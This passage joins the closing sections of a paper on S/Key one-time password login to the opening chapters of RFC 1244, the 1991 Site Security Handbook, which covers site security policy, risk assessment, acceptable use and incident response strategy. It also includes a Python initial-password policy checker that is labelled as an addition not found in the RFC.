communications software on popular personal computers. The following
example illustrates logging in using a trusted personal computer and a
popular terminal emulation program.

o Before starting the communication program, Sue runs the CTKEY
program that ties a TSR to a “hot-key” such as F10.

o Sue identifies herself by login name as above.

o The system issues the same challenge including the seed “unix3”
and the sequence number 54. The host system now expects an
s/key one-time password.

o Sue presses the hot-key and is then prompted for a secret password
by the TSR program on the local system.

o In response to Sue’s secret password, the 54th one-time password
is displayed at the position of the cursor.

o Sue presses “Insert” and the terminal emulator transmits the
one-time password completing the authentication.

If the personal computer were in a trusted location, an option of the
CTKEY program allows the secret password to be stored in a local file.

Form of Password

Internally the one-time password is a 64 bit number. Entering a 64 bit
number is not a pleasant task. The one-time password is therefore
converted to a sequence of six short words (1 to 4 letters). Each word
is chosen from a dictionary of 2048 words. The contents of this
dictionary are not a secret.

Source Screening

It is frequently desirable to allow internal access with a multi-use
password while requiring one-time passwords for external access.
A screening table provides this function. When this table is present,
login attempts that pass the screening test are permitted to use the
normal password or a one-time password. Others are notified that the
use of the one-time password is required.

Password echo

Normally systems disable printing during the typing of a password so
that an onlooker cannot steal the password. With a one-time password,
this is unnecessary. The replacement login command allows the user
to turn echo on by pressing “return” at the password prompt. This
makes it easier to enter the longer one-time password.

Acknowledgments
—————
The idea behind our system was originally described by Leslie Lamport.
Some details of the design were contributed by John S. Walden who
wrote the initial version of the client software.

References
———-

Eugene H. Spafford, “The internet worm program: An analysis.” Computer
Communications Review 19(1):17-57, January 1989.

D. C. Feldmeier and P. R. Karn, “UNIX Password Security – Ten Years
Later”, Crypto ’89 Conference, Santa Barbara, CA, August 20-24, 1989.

J. G. Steiner, C. Neuman, and J. I. Schiller. “Kerberos: An
authentication service for open network systems.” USENIX Conference
Proceedings, pp. 191-202, Dallas, Texas, February 1988.

Catherine R. Avril and Ronald L. Orcutt, “Athena: MIT’s Once and
Future Distributed Computing Project”, Information Technology
Quarterly, Fall 1990, pp. 4-11.

R. L. Rivest, The MD4 Message Digest Algorithm, Crypto ’90 Abstracts
(August 1990), 281-291.

Leslie Lamport, “Password Authentication with Insecure Communication”,
Communications of the ACM 24.11 (November 1981), 770-772.

Site Security Handbook, 1991

Network Working Group                                     P. Holbrook
Request for Comments: 1244                                     CICNet
FYI: 8                                                    J. Reynolds
                                                                  ISI
                                                              Editors
                                                            July 1991

Site Security Handbook

Status of this Memo

This handbook is the product of the Site Security Policy Handbook
Working Group (SSPHWG), a combined effort of the Security Area and
User Services Area of the Internet Engineering Task Force (IETF).
This FYI RFC provides information for the Internet community. It
does not specify an Internet standard. Distribution of this memo is
unlimited.

Contributing Authors

The following are the authors of the Site Security Handbook. Without
their dedication, this handbook would not have been possible.

Dave Curry (Purdue University), Sean Kirkpatrick (Unisys), Tom
Longstaff (LLNL), Greg Hollingsworth (Johns Hopkins University),
Jeffrey Carpenter (University of Pittsburgh), Barbara Fraser (CERT),
Fred Ostapik (SRI NISC), Allen Sturtevant (LLNL), Dan Long (BBN), Jim
Duncan (Pennsylvania State University), and Frank Byrum (DEC).

Editors’ Note

This FYI RFC is a first attempt at providing Internet users guidance
on how to deal with security issues in the Internet. As such, this
document is necessarily incomplete. There are some clear shortfalls;
for example, this document focuses mostly on resources available in
the United States. In the spirit of the Internet’s “Request for
Comments” series of notes, we encourage feedback from users of this
handbook. In particular, those who utilize this document to craft
their own policies and procedures.

This handbook is meant to be a starting place for further research
and should be viewed as a useful resource, but not the final
authority. Different organizations and jurisdictions will have
different resources and rules. Talk to your local organizations,
consult an informed lawyer, or consult with local and national law
enforcement. These groups can help fill in the gaps that this
document cannot hope to cover.

Site Security Policy Handbook Working Group [Page 1]

RFC 1244 Site Security Handbook July 1991

Finally, we intend for this FYI RFC to grow and evolve. Please send
comments and suggestions to: ssphwg@cert.sei.cmu.edu.

Table of Contents

1. Introduction
1.1 Purpose of this Work
1.2 Audience
1.3 Definitions
1.4 Related Work
1.5 Scope
1.6 Why Do We Need Security Policies and Procedures?
1.7 Basic Approach
1.8 Organization of this Document
2. Establishing Official Site Policy on Computer Security
2.1 Brief Overview
2.2 Risk Assessment
2.3 Policy Issues
2.4 What Happens When the Policy Is Violated
2.5 Locking In or Out
2.6 Interpreting the Policy
2.7 Publicizing the Policy
3. Establishing Procedures to Prevent Security Problems
3.1 Security Policy Defines What Needs to be Protected
3.2 Identifying Possible Problems
3.3 Choose Controls to Protect Assets in a Cost-Effective Way
3.4 Use Multiple Strategies to Protect Assets
3.5 Physical Security
3.6 Procedures to Recognize Unauthorized Activity
3.7 Define Actions to Take When Unauthorized Activity is Suspected
3.8 Communicating Security Policy
3.9 Resources to Prevent Security Breaches
4. Types of Security Procedures
4.1 System Security Audits
4.2 Account Management Procedures
4.3 Password Management Procedures
4.4 Configuration Management Procedures
5. Incident Handling
5.1 Overview
5.2 Evaluation
5.3 Possible Types of Notification
5.4 Response
5.5 Legal/Investigative
5.6 Documentation Logs
6. Establishing Post-Incident Procedures
6.1 Overview
6.2 Removing Vulnerabilities
6.3 Capturing Lessons Learned
6.4 Upgrading Policies and Procedures
7. References
8. Annotated Bibliography
8.1 Computer Law
8.2 Computer Security
8.3 Ethics
8.4 The Internet Worm
8.5 National Computer Security Center (NCSC)
8.6 Security Checklists
8.7 Additional Publications
9. Acknowledgements
10. Security Considerations
11. Authors’ Addresses

1. Introduction

1.1 Purpose of this Work

This handbook is a guide to setting computer security policies and
procedures for sites that have systems on the Internet. This guide
lists issues and factors that a site must consider when setting their
own policies. It makes some recommendations and gives discussions of
relevant areas.

This guide is only a framework for setting security policies and
procedures. In order to have an effective set of policies and
procedures, a site will have to make many decisions, gain agreement,
and then communicate and implement the policies.

1.2 Audience

The audience for this work are system administrators and decision
makers (who are more traditionally called “administrators” or “middle
management”) at sites. This document is not directed at programmers
or those trying to create secure programs or systems. The focus of
this document is on the policies and procedures that need to be in
place to support any technical security features that a site may be
implementing.

The primary audience for this work are sites that are members of the
Internet community. However, this document should be useful to any
site that allows communication with other sites. As a general guide
to security policies, this document may also be useful to sites with
isolated systems.

1.3 Definitions

For the purposes of this guide, a “site” is any organization that
owns computers or network-related resources. These resources may
include host computers that users use, routers, terminal servers,
PC’s or other devices that have access to the Internet. A site may
be an end user of Internet services or a service provider such as a
regional network. However, most of the focus of this guide is on
those end users of Internet services.

We assume that the site has the ability to set policies and
procedures for itself with the concurrence and support from those who
actually own the resources.

The “Internet” is that set of networks and machines that use the
TCP/IP protocol suite, connected through gateways, and sharing a
common name and address spaces [1].

The term “system administrator” is used to cover all those who are
responsible for the day-to-day operation of resources. This may be a
number of individuals or an organization.

The term “decision maker” refers to those people at a site who set or
approve policy. These are often (but not always) the people who own
the resources.

1.4 Related Work

The IETF Security Policy Working Group (SPWG) is working on a set of
recommended security policy guidelines for the Internet [23]. These
guidelines may be adopted as policy by regional networks or owners of
other resources. This handbook should be a useful tool to help sites
implement those policies as desired or required. However, even
implementing the proposed policies isn’t enough to secure a site.
The proposed Internet policies deal only with network access
security. They say nothing about how sites should deal with local
security issues.

1.5 Scope

This document covers issues about what a computer security policy
should contain, what kinds of procedures are needed to enforce
security, and some recommendations about how to deal with the
problem. When developing a security policy, close attention should
be paid not only to the security needs and requirements of the local
network, but also to the security needs and requirements of the other
interconnected networks.

This is not a cookbook for computer security. Each site has
different needs; the security needs of a corporation might well be
different than the security needs of an academic institution. Any
security plan has to conform to the needs and culture of the site.

This handbook does not cover details of how to do risk assessment,
contingency planning, or physical security. These things are
essential in setting and implementing effective security policy, but
this document leaves treatment of those issues to other documents.
We will try to provide some pointers in that direction.

This document also doesn’t talk about how to design or implement
secure systems or programs.

1.6 Why Do We Need Security Policies and Procedures?

For most sites, the interest in computer security is proportional to
the perception of risk and threats.

The world of computers has changed dramatically over the past
twenty-five years. Twenty-five years ago, most computers were
centralized and managed by data centers. Computers were kept in
locked rooms and staffs of people made sure they were carefully
managed and physically secured. Links outside a site were unusual.
Computer security threats were rare, and were basically concerned
with insiders: authorized users misusing accounts, theft and
vandalism, and so forth. These threats were well understood and
dealt with using standard techniques: computers behind locked doors,
and accounting for all resources.

Computing in the 1990’s is radically different. Many systems are in
private offices and labs, often managed by individuals or persons
employed outside a computer center. Many systems are connected into
the Internet, and from there around the world: the United States,
Europe, Asia, and Australia are all connected together.

Security threats are different today. The time honored advice says
“don’t write your password down and put it in your desk” lest someone
find it. With world-wide Internet connections, someone could get
into your system from the other side of the world and steal your
password in the middle of the night when your building is locked up.
Viruses and worms can be passed from machine to machine. The
Internet allows the electronic equivalent of the thief who looks for
open windows and doors; now a person can check hundreds of machines
for vulnerabilities in a few hours.

System administrators and decision makers have to understand the
security threats that exist, what the risk and cost of a problem
would be, and what kind of action they want to take (if any) to
prevent and respond to security threats.

As an illustration of some of the issues that need to be dealt with
in security problems, consider the following scenarios (thanks to
Russell Brand [2, BRAND] for these):

– A system programmer gets a call reporting that a
major underground cracker newsletter is being
distributed from the administrative machine at his
center to five thousand sites in the US and
Western Europe.

Eight weeks later, the authorities call to inform
you the information in one of these newsletters
was used to disable “911” in a major city for
five hours.

– A user calls in to report that he can’t login to his
account at 3 o’clock in the morning on a Saturday. The
system staffer can’t login either. After rebooting to
single user mode, he finds that the password file is empty.
By Monday morning, your staff determines that a number
of privileged file transfers took place between this
machine and a local university.

Tuesday morning a copy of the deleted password file is
found on the university machine along with password
files for a dozen other machines.

A week later you find that your system initialization
files had been altered in a hostile fashion.

– You receive a call saying that a breakin to a government
lab occurred from one of your center’s machines. You
are requested to provide accounting files to help
track down the attacker.

A week later you are given a list of machines at your
site that have been broken into.

– A reporter calls up asking about the breakin at your
center. You haven’t heard of any such breakin.

Three days later, you learn that there was a breakin.
The center director had his wife’s name as a password.

– A change in system binaries is detected.

The day that it is corrected, they again are changed.
This repeats itself for some weeks.

– If an intruder is found on your system, should you
leave the system open to monitor the situation or should
you close down the holes and open them up again later?

– If an intruder is using your site, should you call law
enforcement? Who makes that decision? If law enforcement asks
you to leave your site open, who makes that decision?

– What steps should be taken if another site calls you and says
they see activity coming from an account on your system? What
if the account is owned by a local manager?

1.7 Basic Approach

Setting security policies and procedures really means developing a
plan for how to deal with computer security. One way to approach
this task is suggested by Fites et al. [3, FITES]:

– Look at what you are trying to protect.
– Look at what you need to protect it from.
– Determine how likely the threats are.
– Implement measures which will protect your assets in a
cost-effective manner.
– Review the process continuously, and improve things every time
a weakness is found.

This handbook will concentrate mostly on the last two steps, but the
first three are critically important to making effective decisions
about security. One old truism in security is that the cost of
protecting yourself against a threat should be less than the cost of
recovering if the threat were to strike you. Without reasonable
knowledge of what you are protecting and what the likely threats are,
following this rule could be difficult.

1.8 Organization of this Document

This document is organized into seven parts in addition to this
introduction.

The basic form of each section is to discuss issues that a site might
want to consider in creating a computer security policy and setting
procedures to implement that policy. In some cases, possible options
are discussed along with some of the ramifications of those
choices. As far as possible, this document tries not to dictate the
choices a site should make, since these depend on local
circumstances. Some of the issues brought up may not apply to all
sites. Nonetheless, all sites should at least consider the issues
brought up here to ensure that they do not miss some important area.

The overall flow of the document is to discuss policy issues followed
by the issues that come up in creating procedures to implement the
policies.

Section 2 discusses setting official site policies for access to
computing resources. It also goes into the issue of what happens
when the policy is violated. The policies will drive the procedures
that need to be created, so decision makers will need to make choices
about policies before many of the procedural issues in following
sections can be dealt with. A key part of creating policies is doing
some kind of risk assessment to decide what really needs to be
protected and the level of resources that should be applied to
protect them.

Once policies are in place, procedures to prevent future security
problems should be established. Section 3 defines and suggests
actions to take when unauthorized activity is suspected. Resources
to prevent security breaches are also discussed.

Section 4 discusses types of procedures to prevent security problems.
Prevention is a key to security; as an example, the Computer
Emergency Response Team/Coordination Center (CERT/CC) at Carnegie-
Mellon University (CMU) estimates that 80% or more of the problems
they see have to do with poorly chosen passwords.

Section 5 discusses incident handling: what kinds of issues does a
site face when someone violates the security policy. Many decisions
will have to be made on the spot as the incident occurs, but many of the
options and issues can be discussed in advance. At the very least,
responsibilities and methods of communication can be established
before an incident. Again, the choices here are influenced by the
policies discussed in section 2.

Section 6 deals with what happens after a security violation has been
dealt with. Security planning is an on-going cycle; just after an
incident has occurred is an excellent opportunity to improve policies
and procedures.

The rest of the document provides references and an annotated
bibliography.

2. Establishing Official Site Policy on Computer Security

2.1 Brief Overview

2.1.1 Organization Issues

The goal in developing an official site policy on computer
security is to define the organization’s expectations of proper
computer and network use and to define procedures to prevent and
respond to security incidents. In order to do this, aspects of
the particular organization must be considered.

First, the goals and direction of the organization should be
considered. For example, a military base may have very different
security concerns from those of a university.

Second, the site security policy developed must conform to
existing policies, rules, regulations and laws that the
organization is subject to. Therefore it will be necessary to
identify these and take them into consideration while developing
the policy.

Third, unless the local network is completely isolated and
standalone, it is necessary to consider security implications in a
more global context. The policy should address the issues when
local security problems develop as a result of a remote site as
well as when problems occur on remote systems as a result of a
local host or user.

2.1.2 Who Makes the Policy?

Policy creation must be a joint effort by technical personnel, who
understand the full ramifications of the proposed policy and the
implementation of the policy, and by decision makers who have the
power to enforce the policy. A policy which is neither
implementable nor enforceable is useless.

Since a computer security policy can affect everyone in an
organization, it is worth taking some care to make sure you have
the right level of authority in on the policy decisions. Though a
particular group (such as a campus information services group) may
have responsibility for enforcing a policy, an even higher group
may have to support and approve the policy.

2.1.3 Who is Involved?

Establishing a site policy has the potential for involving every
computer user at the site in a variety of ways. Computer users
may be responsible for personal password administration. Systems
managers are obligated to fix security holes and to oversee the
system.

It is critical to get the right set of people involved at the
start of the process. There may already be groups concerned with
security who would consider a computer security policy to be their
area. Some of the types of groups that might be involved include
auditing/control, organizations that deal with physical security,
campus information systems groups, and so forth. Asking these
types of groups to “buy in” from the start can help facilitate the
acceptance of the policy.

2.1.4 Responsibilities

A key element of a computer security policy is making sure
everyone knows their own responsibility for maintaining security.
A computer security policy cannot anticipate all possibilities;
however, it can ensure that each kind of problem does have someone
assigned to deal with it.

There may be levels of responsibility associated with a policy on
computer security. At one level, each user of a computing
resource may have a responsibility to protect his account. A user
who allows his account to be compromised increases the chances of
compromising other accounts or resources.

System managers may form another responsibility level: they must
help to ensure the security of the computer system. Network
managers may reside at yet another level.

2.2 Risk Assessment

2.2.1 General Discussion

One of the most important reasons for creating a computer security
policy is to ensure that efforts spent on security yield cost
effective benefits. Although this may seem obvious, it is
possible to be misled about where the effort is needed. As an
example, there is a great deal of publicity about intruders on
computer systems; yet most surveys of computer security show that
for most organizations, the actual loss from “insiders” is much
greater.

Risk analysis involves determining what you need to protect, what
you need to protect it from, and how to protect it. It is the
process of examining all of your risks, and ranking those risks by
level of severity. This process involves making cost-effective
decisions on what you want to protect. The old security adage
says that you should not spend more to protect something than it
is actually worth.

A full treatment of risk analysis is outside the scope of this
document. [3, FITES] and [16, PFLEEGER] provide introductions to
this topic. However, there are two elements of a risk analysis
that will be briefly covered in the next two sections:

1. Identifying the assets
2. Identifying the threats

For each asset, the basic goals of security are availability,
confidentiality, and integrity. Each threat should be examined
with an eye to how the threat could affect these areas.

2.2.2 Identifying the Assets

One step in a risk analysis is to identify all the things that
need to be protected. Some things are obvious, like all the
various pieces of hardware, but some are overlooked, such as the
people who actually use the systems. The essential point is to
list all things that could be affected by a security problem.

One list of categories is suggested by Pfleeger [16, PFLEEGER,
page 459]; this list is adapted from that source:

1. Hardware: cpus, boards, keyboards, terminals,
workstations, personal computers, printers, disk
drives, communication lines, terminal servers, routers.

2. Software: source programs, object programs,
utilities, diagnostic programs, operating systems,
communication programs.

3. Data: during execution, stored on-line, archived off-line,
backups, audit logs, databases, in transit over
communication media.

4. People: users, people needed to run systems.

5. Documentation: on programs, hardware, systems, local
administrative procedures.

6. Supplies: paper, forms, ribbons, magnetic media.

2.2.3 Identifying the Threats

Once the assets requiring protection are identified, it is
necessary to identify threats to those assets. The threats can
then be examined to determine what potential for loss exists. It
helps to consider from what threats you are trying to protect your
assets.

The following sections describe a few of the possible threats.

2.2.3.1 Unauthorized Access

A common threat that concerns many sites is unauthorized access
to computing facilities. Unauthorized access takes many forms.
One means of unauthorized access is the use of another user’s
account to gain access to a system. The use of any computer
resource without prior permission may be considered
unauthorized access to computing facilities.

The seriousness of an unauthorized access will vary from site
to site. For some sites, the mere act of granting access to an
unauthorized user may cause irreparable harm by negative media
coverage. For other sites, an unauthorized access opens the
door to other security threats. In addition, some sites may be
more frequent targets than others; hence the risk from
unauthorized access will vary from site to site. The Computer
Emergency Response Team (CERT – see section 3.9.7.3.1) has
observed that well-known universities, government sites, and
military sites seem to attract more intruders.

2.2.3.2 Disclosure of Information

Another common threat is disclosure of information. Determine
the value or sensitivity of the information stored on your
computers. Disclosure of a password file might allow for
future unauthorized accesses. A glimpse of a proposal may give
a competitor an unfair advantage. A technical paper may
contain years of valuable research.

2.2.3.3 Denial of Service

Computers and networks provide valuable services to their
users. Many people rely on these services in order to perform
their jobs efficiently. When these services are not available
when called upon, a loss in productivity results.

Denial of service comes in many forms and might affect users in
a number of ways. A network may be rendered unusable by a
rogue packet, jamming, or by a disabled network component. A
virus might slow down or cripple a computer system. Each site
should determine which services are essential, and for each of
these services determine the effect on the site if that service
were to become disabled.

2.3 Policy Issues

There are a number of issues that must be addressed when developing a
security policy. These are:

1. Who is allowed to use the resources?
2. What is the proper use of the resources?
3. Who is authorized to grant access and approve usage?
4. Who may have system administration privileges?
5. What are the user’s rights and responsibilities?
6. What are the rights and responsibilities of the
system administrator vs. those of the user?
7. What do you do with sensitive information?

These issues will be discussed below. In addition you may wish to
include a section in your policy concerning ethical use of computing
resources. Parker, Swope and Baker [17, PARKER90] and Forester and
Morrison [18, FORESTER] are two useful references that address
ethical issues.

2.3.1 Who is Allowed to use the Resources?

One step you must take in developing your security policy is
defining who is allowed to use your system and services. The
policy should explicitly state who is authorized to use what
resources.

2.3.2 What is the Proper Use of the Resources?

After determining who is allowed access to system resources it is
necessary to provide guidelines for the acceptable use of the
resources. You may have different guidelines for different types
of users (i.e., students, faculty, external users). The policy
should state what is acceptable use as well as unacceptable use.
It should also include types of use that may be restricted.

Define limits to access and authority. You will need to consider
the level of access various users will have and what resources
will be available or restricted to various groups of people.

Your acceptable use policy should clearly state that individual
users are responsible for their actions. Their responsibility
exists regardless of the security mechanisms that are in place.
It should be clearly stated that breaking into accounts or
bypassing security is not permitted.

The following points should be covered when developing an
acceptable use policy:

o Is breaking into accounts permitted?
o Is cracking passwords permitted?
o Is disrupting service permitted?
o Should users assume that a file being world-readable
grants them the authorization to read it?
o Should users be permitted to modify files that are
not their own even if they happen to have write
permission?
o Should users share accounts?

The answer to most of these questions will be “no”.

You may wish to incorporate a statement in your policies
concerning copyrighted and licensed software. Licensing
agreements with vendors may require some sort of effort on your
part to ensure that the license is not violated. In addition, you
may wish to inform users that the copying of copyrighted software
may be a violation of the copyright laws, and is not permitted.

Specifically concerning copyrighted and/or licensed software, you
may wish to include the following information:

o Copyrighted and licensed software may not be duplicated
unless it is explicitly stated that you may do so.
o Methods of conveying information on the
copyright/licensed status of software.
o When in doubt, DON’T COPY.

Your acceptable use policy is very important. A policy which does
not clearly state what is not permitted may leave you unable to
prove that a user violated policy.

There are exception cases like tiger teams and users or
administrators wishing for “licenses to hack” — you may face the
situation where users will want to “hack” on your services for
security research purposes. You should develop a policy that will
determine whether you will permit this type of research on your
services and if so, what your guidelines for such research will
be.

Points you may wish to cover in this area:

o Whether it is permitted at all.
o What type of activity is permitted: breaking in, releasing
worms, releasing viruses, etc.
o What type of controls must be in place to ensure that it
does not get out of control (e.g., separate a segment of
your network for these tests).
o How you will protect other users from being victims of
these activities, including external users and networks.
o The process for obtaining permission to conduct these
tests.

In cases where you do permit these activities, you should isolate
the portions of the network that are being tested from your main
network. Worms and viruses should never be released on a live
network.

You may also wish to employ, contract, or otherwise solicit one or
more people or organizations to evaluate the security of your
services, which may include “hacking”. You may wish to provide
for this in your policy.

2.3.3 Who Is Authorized to Grant Access and Approve Usage?

Your policy should state who is authorized to grant access to your
services. Further, it must be determined what type of access they
are permitted to give. If you do not have control over who is
granted access to your system, you will not have control over who
is using your system. Controlling who has the authorization to
grant access will also enable you to know who was or was not
granting access if problems develop later.

There are many schemes that can be developed to control the
distribution of access to your services. The following are the
factors that you must consider when determining who will
distribute access to your services:

o Will you be distributing access from a centralized
point or at various points?

You can have a centralized distribution point to a distributed
system where various sites or departments independently authorize
access. The trade off is between security and convenience. The
more centralized, the easier to secure.

o What methods will you use for creating accounts and
terminating access?

From a security standpoint, you need to examine the mechanism that
you will be using to create accounts. In the least restrictive
case, the people who are authorized to grant access would be able
to go into the system directly and create an account by hand or
through vendor supplied mechanisms. Generally, these mechanisms
place a great deal of trust in the person running them, and the
person running them usually has a large amount of privileges. If
this is the choice you make, you need to select someone who is
trustworthy to perform this task. The opposite solution is to
have an integrated system that the people authorized to create
accounts run, or the users themselves may actually run. Be aware
that even the restrictive case of having a mechanized facility
to create accounts does not remove the potential for abuse.

You should have specific procedures developed for the creation of
accounts. These procedures should be well documented to prevent
confusion and reduce mistakes. A security vulnerability in the
account authorization process is not only possible through abuse,
but is also possible if a mistake is made. Having clear and well
documented procedures will help ensure that these mistakes won’t
happen. You should also be sure that the people who will be
following these procedures understand them.

The granting of access to users is one of the most vulnerable of
times. You should ensure that the selection of an initial
password cannot be easily guessed. You should avoid using an
initial password that is a function of the username, is part of
the user’s name, or some algorithmically generated password that
can easily be guessed. In addition, you should not permit users
to continue to use the initial password indefinitely. If
possible, you should force users to change the initial password
the first time they login. Consider that some users may never
even login, leaving their password vulnerable indefinitely. Some
sites choose to disable accounts that have never been accessed,
and force the owner to reauthorize opening the account.
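One way to enforce the initial-password advice above, as an added example that is not part of RFC 1244. The account record fields, the 14-day grace period and the sample accounts are assumptions constructed for illustration.

```python
import re
import secrets
import string
from datetime import date

ALPHABET = string.ascii_letters + string.digits


def identity_tokens(username, full_name):
    """Strings a guesser tries first: the login name and each part of the real name."""
    parts = re.split(r"[^A-Za-z]+", username + " " + full_name)
    return {p.lower() for p in parts if len(p) >= 3}


def derived_from_identity(password, username, full_name):
    """True if the password is built from the username or the user's name."""
    # Drop digits and punctuation so 'jsmith1!' and 'Smith-93' reduce to the name.
    core = re.sub(r"[^a-z]", "", password.lower())
    return any(tok in core or tok[::-1] in core
               for tok in identity_tokens(username, full_name))


def issue_initial_password(username, full_name, length=14):
    """Random initial password that is not a function of the account's identity."""
    while True:
        candidate = "".join(secrets.choice(ALPHABET) for _ in range(length))
        if not derived_from_identity(candidate, username, full_name):
            return candidate


def audit_accounts(accounts, today, grace_days=14):
    """Map username -> required action for accounts that break the policy."""
    actions = {}
    for acct in accounts:
        if acct["last_login"] is None:
            # Never used: the initial password stays exposed indefinitely.
            if (today - acct["created"]).days > grace_days:
                actions[acct["user"]] = "disable until owner reauthorizes"
        elif not acct["password_changed"]:
            # Logged in at least once but still on the issued password.
            actions[acct["user"]] = "force password change at next login"
    return actions


# Constructed sample records (field names are assumptions, not a real account database).
SAMPLE_ACCOUNTS = [
    {"user": "jsmith", "created": date(1993, 10, 1),
     "last_login": None, "password_changed": False},
    {"user": "mlee", "created": date(1993, 11, 25),
     "last_login": None, "password_changed": False},
    {"user": "rgarcia", "created": date(1993, 9, 1),
     "last_login": date(1993, 11, 30), "password_changed": False},
    {"user": "tnguyen", "created": date(1993, 9, 1),
     "last_login": date(1993, 11, 30), "password_changed": True},
]

if __name__ == "__main__":
    print(issue_initial_password("jsmith", "Jane Smith"))
    for user, action in audit_accounts(SAMPLE_ACCOUNTS, date(1993, 12, 1)).items():
        print(user, "->", action)
```
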

2.3.4 Who May Have System Administration Privileges?

One security decision that needs to be made very carefully is who
will have access to system administrator privileges and passwords
for your services. Obviously, the system administrators will need
access, but inevitably other users will request special
privileges. The policy should address this issue. Restricting
privileges is one way to deal with threats from local users. The
challenge is to balance restricting access to these to protect
security with giving people who need these privileges access so
that they can perform their tasks. One approach that can be taken
is to grant only enough privilege to accomplish the necessary
tasks.

Additionally, people holding special privileges should be
accountable to some authority and this should also be identified
within the site’s security policy. If the people you grant
privileges to are not accountable, you run the risk of losing
control of your system and will have difficulty managing a
compromise in security.

2.3.5 What Are The Users’ Rights and Responsibilities?

The policy should incorporate a statement on the users’ rights and
responsibilities concerning the use of the site’s computer systems
and services. It should be clearly stated that users are
responsible for understanding and respecting the security rules of
the systems they are using. The following is a list of topics
that you may wish to cover in this area of the policy:

o What guidelines you have regarding resource consumption
(whether users are restricted, and if so, what the
restrictions are).
o What might constitute abuse in terms of system performance.
o Whether users are permitted to share accounts or let others
use their accounts.
o How “secret” users should keep their passwords.
o How often users should change their passwords and any other
password restrictions or requirements.
o Whether you provide backups or expect the users to create
their own.
o Disclosure of information that may be proprietary.
o Statement on Electronic Mail Privacy (Electronic
Communications Privacy Act).
o Your policy concerning controversial mail or postings to
mailing lists or discussion groups (obscenity, harassment,
etc.).
o Policy on electronic communications: mail forging, etc.

The Electronic Mail Association sponsored a white paper on the
privacy of electronic mail in companies [4]. Their basic
recommendation is that every site should have a policy on the
protection of employee privacy. They also recommend that
organizations establish privacy policies that deal with all media,
rather than singling out electronic mail.

They suggest five criteria for evaluating any policy:

1. Does the policy comply with law and with duties to
third parties?

2. Does the policy unnecessarily compromise the interest of
the employee, the employer or third parties?

3. Is the policy workable as a practical matter and likely to
be enforced?

4. Does the policy deal appropriately with all different
forms of communications and record keeping with the office?

5. Has the policy been announced in advance and agreed to by
all concerned?

2.3.6 What Are The Rights and Responsibilities of System
Administrators Versus Rights of Users

There is a tradeoff between a user’s right to absolute privacy and
the need of system administrators to gather sufficient information
to diagnose problems. There is also a distinction between a
system administrator’s need to gather information to diagnose
problems and investigating security violations. The policy should
specify to what degree system administrators can examine user
files to diagnose problems or for other purposes, and what rights
you grant to the users. You may also wish to make a statement
concerning system administrators’ obligation to maintain the
privacy of information viewed under these circumstances. A few
questions that should be answered are:

o Can an administrator monitor or read a user’s files
for any reason?
o What are the liabilities?
o Do network administrators have the right to examine
network or host traffic?

2.3.7 What To Do With Sensitive Information

Before granting users access to your services, you need to
determine at what level you will provide for the security of data
on your systems. By determining this, you are determining the
level of sensitivity of data that users should store on your
systems. You do not want users to store very sensitive
information on a system that you are not going to secure very
well. You need to tell users who might store sensitive
information what services, if any, are appropriate for the storage
of sensitive information. This part should include storing of
data in different ways (disk, magnetic tape, file servers, etc.).
Your policy in this area needs to be coordinated with the policy
concerning the rights of system administrators versus users (see
section 2.3.6).

2.4 What Happens When the Policy is Violated

It is obvious that when any type of official policy is defined, be it
related to computer security or not, it will eventually be broken.
The violation may occur due to an individual’s negligence, accidental
mistake, having not been properly informed of the current policy, or
not understanding the current policy. It is equally possible that an
individual (or group of individuals) may knowingly perform an act
that is in direct violation of the defined policy.

When a policy violation has been detected, the immediate course of
action should be pre-defined to ensure prompt and proper enforcement.
An investigation should be performed to determine how and why the
violation occurred. Then the appropriate corrective action should be
executed. The type and severity of action taken varies depending on
the type of violation that occurred.

2.4.1 Determining the Response to Policy Violations

Violations to policy may be committed by a wide variety of users.
Some may be local users and others may be from outside the local
environment. Sites may find it helpful to define what they
consider “insiders” and “outsiders” based upon administrative,
legal or political boundaries. These boundaries imply what type
of action must be taken to correct the offending party; from a
written reprimand to pressing legal charges. So, not only do you
need to define actions based on the type of violation, you also
need to have a clearly defined series of actions based on the kind
of user violating your computer security policy. This all seems
rather complicated, but should be addressed long before it becomes
necessary as the result of a violation.

One point to remember about your policy is that proper education
is your best defense. For the outsiders who are using your
computer legally, it is your responsibility to verify that these
individuals are aware of the policies that you have set forth.
Having this proof may assist you in the future if legal action
becomes necessary.

As for users who are using your computer illegally, the problem is
basically the same. What type of user violated the policy and how
and why did they do it? Depending on the results of your
investigation, you may just prefer to “plug” the hole in your
computer security and chalk it up to experience. Or if a
significant amount of loss was incurred, you may wish to take more
drastic action.

2.4.2 What to do When Local Users Violate the Policy of a Remote
Site

In the event that a local user violates the security policy of a
remote site, the local site should have a clearly defined set of
administrative actions to take concerning that local user. The
site should also be prepared to protect itself against possible
actions by the remote site. These situations involve legal issues
which should be addressed when forming the security policy.

2.4.3 Defining Contacts and Responsibilities to Outside
Organizations

The local security policy should include procedures for
interaction with outside organizations. These include law
enforcement agencies, other sites, external response team
organizations (e.g., the CERT, CIAC) and various press agencies.
The procedure should state who is authorized to make such contact
and how it should be handled. Some questions to be answered
include:

o Who may talk to the press?
o When do you contact law enforcement and investigative agencies?
o If a connection is made from a remote site, is the
system manager authorized to contact that site?
o Can data be released? What kind?

Detailed contact information should be readily available along
with clearly defined procedures to follow.

2.4.4 What are the Responsibilities to our Neighbors and Other
Internet Sites?

The Security Policy Working Group within the IETF is working on a
document entitled, “Policy Guidelines for the Secure Operation of
the Internet” [23]. It addresses the issue that the Internet is a
cooperative venture and that sites are expected to provide mutual
security assistance. This should be addressed when developing a
site’s policy. The major issue to be determined is how much
information should be released. This will vary from site to site
according to the type of site (e.g., military, education,
commercial) as well as the type of security violation that
occurred.

2.4.5 Issues for Incident Handling Procedures

Along with statements of policy, the document being prepared
should include procedures for incident handling. This is covered
in detail in the next chapter. There should be procedures
available that cover all facets of policy violation.

2.5 Locking In or Out

Whenever a site suffers an incident which may compromise computer
security, the strategies for reacting may be influenced by two
opposing pressures.

If management fears that the site is sufficiently vulnerable, it may
choose a “Protect and Proceed” strategy. This approach will have as
its primary goal the protection and preservation of the site
facilities and to provide for normalcy for its users as quickly as
possible. Attempts will be made to actively interfere with the
intruder’s processes, prevent further access and begin immediate
damage assessment and recovery. This process may involve shutting
down the facilities, closing off access to the network, or other
drastic measures. The drawback is that unless the intruder is
identified directly, they may come back into the site via a different
path, or may attack another site.

The alternate approach, “Pursue and Prosecute”, adopts the opposite
philosophy and goals. The primary goal is to allow intruders to
continue their activities at the site until the site can identify the
responsible persons. This approach is endorsed by law enforcement
agencies and prosecutors. The drawback is that the agencies cannot
